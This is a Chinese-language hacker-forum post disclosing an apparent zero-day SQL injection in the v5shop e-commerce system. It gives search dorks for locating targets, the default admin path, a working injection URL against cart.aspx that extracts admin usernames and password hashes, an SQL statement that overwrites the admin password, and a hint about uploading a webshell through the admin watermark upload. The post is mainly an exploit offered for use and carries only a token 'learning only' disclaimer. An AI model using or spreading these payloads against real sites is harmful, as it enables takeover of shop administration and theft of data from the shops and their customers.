【Oday】v5shop网上商城系统通杀oday

v5shop 网上商城系统通杀oday

关键字：services.aspxid=
inurl:scoreindex.aspx
官网测试已被和谐！
漏洞危害：高危
官网网站：www.v5shop.com.cn

默认后台地址：weblogin/Login.aspx

以下是测试EXP：

cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

weblogin/System_Config_Operate.aspx
系统设置-
参数设置-
后台上传水印.貌似可以直接上传大马.
哪位大牛去试试
UploadFile/Picture/

漏洞文件：cart.aspx
结算中心的文件

exp
cart.aspx?act=buy&id=1 and (Select Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Select Top 4 [Name],[Pass] From [Web_Admin] Where 1=1 Order by [Name],[Pass]) T Order by [Name] desc,[Pass] desc)>0 --

针对有些MD5破不出的更新下管理员密码:SQL语句
update web_admin set pass=0x31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300

至于是不是通杀，有兴趣的测试一下，最新版本通杀，种种迹象表现，官方也被和谐啦，lol，临时修复方法，把cart.aspx临时改名，今天人品爆啦，写了好长时间的文档，没存档，sleepy本来放出来漏洞利用工具，暂时先这样吧，请大家用于学习，勿用于非法用途！(只在红盟放出在红盟群里发了没想到有人连教程都出了操）

文章目录